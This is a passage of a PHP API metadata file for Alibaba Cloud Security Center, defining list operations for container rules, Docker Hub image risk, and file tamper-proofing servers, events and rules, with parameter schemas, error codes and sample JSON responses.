'query', 'schema' => ['description' => 'The name of the rule.'."\n", 'type' => 'string', 'required' => false, 'example' => 'test', 'title' => ''], ], [ 'name' => 'Namespace', 'in' => 'query', 'schema' => ['description' => 'The namespace of the cluster.'."\n" ."\n" .'> You can call the [GetOpaClusterNamespaceList](~~GetOpaClusterNamespaceList~~) operation to query the namespaces of clusters.'."\n", 'type' => 'string', 'required' => false, 'example' => 'test', 'title' => ''], ], [ 'name' => 'ImageName', 'in' => 'query', 'schema' => ['description' => 'The name of the image.'."\n" ."\n" .'> You can call the [GetOpaClusterImageList](~~GetOpaClusterImageList~~) operation to query the names of images.'."\n", 'type' => 'string', 'required' => false, 'example' => 'testImage', 'title' => ''], ], [ 'name' => 'Label', 'in' => 'query', 'schema' => ['description' => 'The tag that is added to the container.'."\n" ."\n" .'> You can call the [GetOpaClusterLabelList](~~GetOpaClusterLabelList~~) operation to query the tags that are added to containers.'."\n", 'type' => 'string', 'required' => false, 'example' => 'testlabel', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => 'PlainResult>', 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The IDs and names of the rules.'."\n", 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The unique identifier of the rule.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => 'test', 'title' => ''], 'Value' => ['description' => 'The name of the rule.'."\n", 'type' => 'string', 'example' => 'test', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The response code. The status code **200** indicates that the request was successful. Other status codes indicate that the request failed. You can identify the cause of the failure based on the status code.'."\n", 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The returned message.'."\n", 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '835851E3-AFA2-5EA7-93E9-4FC9BCF3F973', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'ListCriteriaStrategy', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListCriteriaStrategy'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListCriteriaStrategy', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": [\\n {\\n \\"Id\\": 0,\\n \\"Value\\": \\"test\\"\\n }\\n ],\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"835851E3-AFA2-5EA7-93E9-4FC9BCF3F973\\"\\n}","type":"json"}]', ], 'ListDockerhubImage' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'list'], 'parameters' => [ [ 'name' => 'Query', 'in' => 'query', 'schema' => ['description' => 'The image query condition. The format is `[namespace/]repoName[:version]`. The query conditions in `[]` are optional.', 'type' => 'string', 'required' => true, 'example' => 'python:3.9', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The unique identifier that Alibaba Cloud generates for the request.', 'type' => 'string', 'example' => 'F8B6F758-BCD4-597A-8A2C-DA5A552C****', 'title' => ''], 'ImageList' => [ 'description' => 'The list of image information.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Uuid' => ['description' => 'The UUID of the image.', 'type' => 'string', 'example' => 'a9b50827-801f-414c-900d-c4a223d*****', 'title' => ''], 'ImageSize' => ['description' => 'The image size, in bytes.', 'type' => 'integer', 'format' => 'int64', 'example' => '1024', 'title' => ''], 'Digest' => ['description' => 'The digest value of the image.', 'type' => 'string', 'example' => '5ffded22661b0f1e9c7fcccb0d488cff*****f8c52a819bd7179ef3e4a041988', 'title' => ''], 'HcCount' => ['description' => 'The number of baseline risks.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'Tag' => ['description' => 'The image tag.', 'type' => 'string', 'example' => '3.9', 'title' => ''], 'VulCount' => ['description' => 'The number of detected vulnerabilities.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'ImageId' => ['description' => 'The image ID.', 'type' => 'string', 'example' => 'd943de1933650d74b415d3ae8b37c064a0e0c700574d7a949c26db3291******', 'title' => ''], 'RepoName' => ['description' => 'The image repository name.', 'type' => 'string', 'example' => 'python', 'title' => ''], 'RepoNamespace' => ['description' => 'The image namespace.', 'type' => 'string', 'example' => 'python', 'title' => ''], 'RiskLevelDetail' => ['description' => 'The risk details of the image.', 'type' => 'string', 'example' => '{"vul":0}', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query docker hub images', 'summary' => 'Queries the risk overview of official Docker Hub images.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListDockerhubImage'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListDockerhubImage', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"F8B6F758-BCD4-597A-8A2C-DA5A552C****\\",\\n \\"ImageList\\": [\\n {\\n \\"Uuid\\": \\"a9b50827-801f-414c-900d-c4a223d*****\\",\\n \\"ImageSize\\": 1024,\\n \\"Digest\\": \\"5ffded22661b0f1e9c7fcccb0d488cff*****f8c52a819bd7179ef3e4a041988\\",\\n \\"HcCount\\": 0,\\n \\"Tag\\": \\"3.9\\",\\n \\"VulCount\\": 0,\\n \\"ImageId\\": \\"d943de1933650d74b415d3ae8b37c064a0e0c700574d7a949c26db3291******\\",\\n \\"RepoName\\": \\"python\\",\\n \\"RepoNamespace\\": \\"python\\",\\n \\"RiskLevelDetail\\": \\"{\\\\\\"vul\\\\\\":0}\\"\\n }\\n ]\\n}","type":"json"}]', ], 'ListFileProtectBindMachine' => [ 'path' => '', 'methods' => ['get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas4OHMAP'], ], 'parameters' => [ [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page for a paged query.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '10', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page for a paged query.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Schema of Response', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'Id of the request', 'type' => 'string', 'example' => '1EE7B150-D67E-53FD-A52D-3E8E669A****'], 'List' => [ 'description' => 'The list of servers. The UUID of each server is returned.', 'type' => 'array', 'items' => ['description' => 'The list of servers. The UUID of each server is returned.', 'type' => 'string', 'example' => '4fe8e1cd-3c37-4851-b9de-124da32c****', 'title' => ''], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The paging information for the paged query.', 'type' => 'object', 'properties' => [ 'TotalCount' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int64', 'example' => '69', 'title' => ''], 'Count' => ['description' => 'The number of entries on the current page for a paged query.', 'type' => 'integer', 'format' => 'int64', 'example' => '10', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Retrieve the list of servers associated with file tamper-proofing', 'summary' => 'Retrieves the list of servers associated with tamper-proofing.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListFileProtectBindMachine', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"1EE7B150-D67E-53FD-A52D-3E8E669A****\\",\\n \\"List\\": [\\n \\"4fe8e1cd-3c37-4851-b9de-124da32c****\\"\\n ],\\n \\"PageInfo\\": {\\n \\"TotalCount\\": 69,\\n \\"Count\\": 10\\n }\\n}","type":"json"}]', ], 'ListFileProtectClientEvent' => [ 'summary' => 'Retrieves the list of file protection events.', 'methods' => ['get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '189052', 'abilityTreeNodes' => ['FEATUREsas4GT4R7'], ], 'parameters' => [ [ 'name' => 'RuleName', 'in' => 'query', 'schema' => ['description' => 'The name of the configuration rule.', 'type' => 'string', 'required' => false, 'example' => 'text-001', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => [ 'description' => 'The event status. Valid values:'."\n" .'- **0**: Unhandled.'."\n" .'- **1**: Handled.'."\n" .'- **2**: Whitelisted.', 'type' => 'string', 'enum' => ['0', '1', '2'], 'required' => false, 'example' => '0', 'title' => '', ], ], [ 'name' => 'AlertLevels', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of alert notification levels.', 'type' => 'array', 'items' => ['description' => 'The alert notification level. Valid values:'."\n" ."\n" .'- 0: no alert'."\n" ."\n" .'- 1: reminder'."\n" ."\n" .'- 2: suspicious'."\n" ."\n" .'- 3: high-risk.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page when paging is used in a paged query.', 'type' => 'integer', 'format' => 'int32', 'minimum' => '1', 'default' => '1', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page when paging is used in a paged query.', 'type' => 'integer', 'format' => 'int32', 'maximum' => '100', 'minimum' => '1', 'default' => '10', 'required' => false, 'example' => '100', 'title' => ''], ], [ 'name' => 'InstanceId', 'in' => 'query', 'schema' => ['description' => 'The ID of the asset instance.', 'type' => 'string', 'required' => false, 'example' => 'i-bp1fu4aqltf1huhc****', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server to query.'."\n" .'> Call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => '4fe8e1cd-3c37-4851-b9de-124da32c****', 'title' => ''], ], [ 'name' => 'InstanceName', 'in' => 'query', 'schema' => ['description' => 'The name of the asset instance.', 'type' => 'string', 'required' => false, 'example' => 'ca_cpm_****', 'title' => ''], ], [ 'name' => 'InternetIp', 'in' => 'query', 'schema' => ['description' => 'The public IP address.', 'type' => 'string', 'required' => false, 'example' => '120.27.XX.XX', 'title' => ''], ], [ 'name' => 'IntranetIp', 'in' => 'query', 'schema' => ['description' => 'The private IP address.', 'type' => 'string', 'required' => false, 'example' => '172.26.XX.XX', 'title' => ''], ], [ 'name' => 'StartTime', 'in' => 'query', 'schema' => ['description' => 'The start time.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1650470399999', 'title' => ''], ], [ 'name' => 'EndTime', 'in' => 'query', 'schema' => ['description' => 'The end timestamp.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1650470399999', 'title' => ''], ], [ 'name' => 'Operation', 'in' => 'query', 'schema' => ['description' => 'The type of operation performed on the file. Valid values:'."\n" ."\n" .'- **DELETE**: deletes the file.'."\n" .'- **WRITE**: writes to the file.'."\n" .'- **READ**: reads the file.'."\n" .'- **RENAME**: renames the file.'."\n" .'- **CHOWN**: changes the file owner and associated group.', 'type' => 'string', 'required' => false, 'example' => 'READ', 'title' => ''], ], [ 'name' => 'ProcPath', 'in' => 'query', 'schema' => ['description' => 'The process path.', 'type' => 'string', 'required' => false, 'example' => 'c:/windows/system32/i****', 'title' => ''], ], [ 'name' => 'FilePath', 'in' => 'query', 'schema' => ['description' => 'The file path.', 'type' => 'string', 'required' => false, 'example' => '/etc/pam****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Schema of Response', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'Id of the request', 'type' => 'string', 'example' => 'ACF97412-FD09-4D1F-994F-34DF12B****'], 'EventList' => [ 'description' => 'The file monitoring events.', 'type' => 'array', 'items' => [ 'description' => 'The file monitoring events.', 'type' => 'object', 'properties' => [ 'AlertLevel' => ['description' => 'The alert notification level. Valid values:'."\n" ."\n" .'- 0: no alert'."\n" ."\n" .'- 1: reminder'."\n" ."\n" .'- 2: suspicious'."\n" ."\n" .'- 3: high-risk.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the server.', 'type' => 'string', 'example' => '94b44720-d982-4d20-a4e1-80a1a57b****', 'title' => ''], 'RuleName' => ['description' => 'The rule name.', 'type' => 'string', 'example' => 'test-rule-1'."\n", 'title' => ''], 'LatestTime' => ['description' => 'The most recent time the event occurred.', 'type' => 'integer', 'format' => 'int64', 'example' => '1694576692000', 'title' => ''], 'FirstTime' => ['description' => 'The timestamp when the event was first detected. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1694576692000', 'title' => ''], 'Status' => ['description' => 'The event status. Valid values:'."\n" ."\n" .'- 0: unhandled '."\n" .'- 1: handled'."\n" .'- 2: whitelisted.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Id' => ['description' => 'The event ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '3719', 'title' => ''], 'InstanceName' => ['description' => 'The name of the server instance.', 'type' => 'string', 'example' => 'kyy-admin-01', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the instance.', 'type' => 'string', 'example' => '121.40.XX.XX'."\n", 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the instance.', 'type' => 'string', 'example' => '172.22.XX.XX', 'title' => ''], 'FilePath' => ['description' => 'The file path.', 'type' => 'string', 'example' => '/data/*', 'title' => ''], 'Operation' => ['description' => 'The type of operation performed on the file. Valid values:'."\n" ."\n" .'- **DELETE**: deletes the file.'."\n" .'- **WRITE**: writes to the file.'."\n" .'- **READ**: reads the file.'."\n" .'- **RENAME**: renames the file.'."\n" .'- **CHOWN**: changes the file owner and associated group.', 'type' => 'string', 'example' => 'DELETE', 'title' => ''], 'Remark' => ['description' => 'The remarks.', 'type' => 'string', 'example' => 'test', 'title' => ''], 'ProcPermission' => ['description' => 'The process permission.', 'type' => 'string', 'example' => 'rwxr-xr-x', 'title' => ''], 'CmdLine' => ['description' => 'The command line of the event.', 'type' => 'string', 'example' => '["touch","/test/aaaa"]', 'title' => ''], 'ProcPath' => ['description' => 'The process path.', 'type' => 'string', 'example' => 'c:/*Unity*', 'title' => ''], 'HandleTime' => ['description' => 'The time when the event was handled.', 'type' => 'integer', 'format' => 'int64', 'example' => '1694576692000', 'title' => ''], 'ProcessId' => ['description' => 'The process ID of the event.', 'type' => 'string', 'example' => '52636', 'title' => ''], 'Platform' => ['description' => 'The operating system type. Valid values:'."\n" ."\n" .'- **windows**: Windows'."\n" .'- **linux**: Linux.', 'type' => 'string', 'example' => 'linux', 'title' => ''], 'RuleAction' => ['description' => 'The rule action. Valid values:'."\n" ."\n" .'- **block**: Block.'."\n" ."\n" .'- **monitor**: Monitor.', 'type' => 'string', 'example' => 'block', 'title' => ''], 'Count' => ['description' => 'The number of times the event occurred.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The pagination information of the query result.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page when paging is used in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page when paging is used in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '263', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParameter', 'errorMessage' => 'Illegal parameter, please check the param.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Retrieve web tamper-proofing event list', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListFileProtectClientEvent', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"ACF97412-FD09-4D1F-994F-34DF12B****\\",\\n \\"EventList\\": [\\n {\\n \\"AlertLevel\\": 1,\\n \\"Uuid\\": \\"94b44720-d982-4d20-a4e1-80a1a57b****\\",\\n \\"RuleName\\": \\"test-rule-1\\\\n\\",\\n \\"LatestTime\\": 1694576692000,\\n \\"FirstTime\\": 1694576692000,\\n \\"Status\\": 1,\\n \\"Id\\": 3719,\\n \\"InstanceName\\": \\"kyy-admin-01\\",\\n \\"InternetIp\\": \\"121.40.XX.XX\\\\n\\",\\n \\"IntranetIp\\": \\"172.22.XX.XX\\",\\n \\"FilePath\\": \\"/data/*\\",\\n \\"Operation\\": \\"DELETE\\",\\n \\"Remark\\": \\"test\\",\\n \\"ProcPermission\\": \\"rwxr-xr-x\\",\\n \\"CmdLine\\": \\"[\\\\\\"touch\\\\\\",\\\\\\"/test/aaaa\\\\\\"]\\",\\n \\"ProcPath\\": \\"c:/*Unity*\\",\\n \\"HandleTime\\": 1694576692000,\\n \\"ProcessId\\": \\"52636\\",\\n \\"Platform\\": \\"linux\\",\\n \\"RuleAction\\": \\"block\\",\\n \\"Count\\": 3\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 263\\n }\\n}","type":"json"}]', ], 'ListFileProtectClientRule' => [ 'summary' => 'Retrieves a list of file protection rules.', 'methods' => ['get', 'post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas4OHMAP'], ], 'parameters' => [ [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page for a paged query.', 'type' => 'integer', 'format' => 'int32', 'maximum' => '100', 'minimum' => '1', 'default' => '10', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'minimum' => '1', 'default' => '1', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'RuleName', 'in' => 'query', 'schema' => ['description' => 'The rule name.', 'type' => 'string', 'required' => false, 'example' => 'tetsRule', 'title' => ''], ], [ 'name' => 'AlertLevel', 'in' => 'query', 'schema' => [ 'description' => 'The alert notification level. Valid values:'."\n" ."\n" .'- 0: no alert'."\n" ."\n" .'- 1: reminder'."\n" ."\n" .'- 2: suspicious'."\n" ."\n" .'- 3: high-risk.', 'type' => 'integer', 'format' => 'int32', 'enum' => ['0', '1', '2', '3'], 'required' => false, 'example' => '0', 'title' => '', ], ], [ 'name' => 'RuleAction', 'in' => 'query', 'schema' => ['description' => 'The rule action. Valid values:'."\n" ."\n" .'- **block**: blocks the request.'."\n" ."\n" .'- **monitor**: monitors the request.'."\n" ."\n" .'- **pass**: allows the request.', 'type' => 'string', 'required' => false, 'example' => 'pass', 'title' => ''], ], [ 'name' => 'Platform', 'in' => 'query', 'schema' => ['description' => 'The operating system type. Valid values:'."\n" ."\n" .'- **windows**: Windows'."\n" .'- **linux**: Linux.', 'type' => 'string', 'required' => false, 'example' => 'linux', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'BA674E4B-00CF-5DEA-8B92-360862FB****', 'title' => ''], 'PageInfo' => [ 'description' => 'The paging information for the paged query.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '45', 'title' => ''], ], 'title' => '', 'example' => '', ], 'FileProtectList' => [ 'description' => 'The list of returned data.', 'type' => 'array', 'items' => [ 'description' => 'The list of returned data.', 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The status of the rule. Valid values:'."\n" ."\n" .'- 0: disabled'."\n" .'- 1: enabled.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RuleAction' => ['description' => 'The action that the rule performs on the client. Valid values:'."\n" ."\n" .'- monitor: alert'."\n" ."\n" .'- block: block'."\n" ."\n" .'- pass: allow.', 'type' => 'string', 'example' => 'pass', 'title' => ''], 'Platform' => ['description' => 'The operating system type. Valid values:'."\n" ."\n" .'- **windows**: Windows'."\n" .'- **linux**: Linux.', 'type' => 'string', 'example' => 'linux', 'title' => ''], 'EffectInstanceCount' => ['description' => 'The total number of affected assets.', 'type' => 'integer', 'format' => 'int64', 'example' => '12', 'title' => ''], 'GmtModified' => ['description' => 'The time when the rule was last modified.', 'type' => 'integer', 'format' => 'int64', 'example' => '1682304179000', 'title' => ''], 'SwitchId' => ['description' => 'The switch ID of the rule.', 'type' => 'string', 'example' => 'FILE_PROTECT_RULE_SWITCH_TYPE_******', 'title' => ''], 'GmtCreate' => ['description' => 'The time when the rule was created.', 'type' => 'integer', 'format' => 'int64', 'example' => '1682304179000', 'title' => ''], 'FilePaths' => [ 'description' => 'The monitored file paths.', 'type' => 'array', 'items' => ['description' => 'The monitored file paths.', 'type' => 'string', 'example' => '/usr/*', 'title' => ''], 'title' => '', 'example' => '', ], 'FileOps' => [ 'description' => 'The operations performed on files.', 'type' => 'array', 'items' => ['description' => 'The operations performed on files. Valid values:'."\n" ."\n" .'- WRITE: write'."\n" .'- READ: read'."\n" .'- DELETE: delete'."\n" .'- RENAME: rename'."\n" .'- CHMOD: modify permissions.', 'type' => 'string', 'example' => 'READ', 'title' => ''], 'title' => '', 'example' => '', ], 'FileTypes' => [ 'description' => 'The list of protected file types.', 'type' => 'array', 'items' => ['description' => 'The list of protected file types.', 'type' => 'string', 'example' => 'txt', 'title' => ''], 'title' => '', 'example' => '', ], 'ProcPaths' => [ 'description' => 'The list of monitored process paths.', 'type' => 'array', 'items' => ['description' => 'The list of monitored process paths.', 'type' => 'string', 'example' => '/usr/local/*', 'title' => ''], 'title' => '', 'example' => '', ], 'AlertLevel' => ['description' => 'The alert notification level. Valid values:'."\n" ."\n" .'- 0: no alert'."\n" ."\n" .'- 1: reminder'."\n" ."\n" .'- 2: suspicious'."\n" ."\n" .'- 3: high-risk.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'Id' => ['description' => 'The rule ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '1412511', 'title' => ''], 'ExcludeUsers' => [ 'description' => 'The list of excluded users.', 'type' => 'array', 'items' => ['description' => 'The list of excluded users.', 'type' => 'string', 'example' => 'root', 'title' => ''], 'title' => '', 'example' => '', ], 'RuleName' => ['description' => 'The rule name.', 'type' => 'string', 'example' => 'test11', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParameter', 'errorMessage' => 'Illegal parameter, please check the param.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Retrieve web tamper-proofing rules', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListFileProtectClientRule', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'FileProtectClientRule', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:fileprotectclientrule/*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"BA674E4B-00CF-5DEA-8B92-360862FB****\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 10,\\n \\"TotalCount\\": 45\\n },\\n \\"FileProtectList\\": [\\n {\\n \\"Status\\": 1,\\n \\"RuleAction\\": \\"pass\\",\\n \\"Platform\\": \\"linux\\",\\n \\"EffectInstanceCount\\": 12,\\n \\"GmtModified\\": 1682304179000,\\n \\"SwitchId\\": \\"FILE_PROTECT_RULE_SWITCH_TYPE_******\\",\\n \\"GmtCreate\\": 1682304179000,\\n \\"FilePaths\\": [\\n \\"/usr/*\\"\\n ],\\n \\"FileOps\\": [\\n \\"READ\\"\\n ],\\n \\"FileTypes\\": [\\n \\"txt\\"\\n ],\\n \\"ProcPaths\\": [\\n \\"/usr/local/*\\"\\n ],\\n \\"AlertLevel\\": 0,\\n \\"Id\\": 1412511,\\n \\"ExcludeUsers\\": [\\n \\"root\\"\\n ],\\n \\"RuleName\\": \\"test11\\"\\n }\\n ]\\n}","type":"json"}]', ], 'ListFileProtectClientRuleFileType' => [ 'methods' => ['get', 'post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas4OHMAP'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. The ID is generated by Alibaba Cloud and is unique. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'F8B6F758-BCD4-597A-8A2C-DA5A552C****', 'title' => ''], 'FileTypes' => [ 'description' => 'The protected file types.', 'type' => 'array', 'items' => ['description' => 'The protected file types.', 'type' => 'string', 'example' => 'txt', 'title' => ''], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParameter', 'errorMessage' => 'Illegal parameter, please check the param.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Retrieve file types for web tamper-proofing', 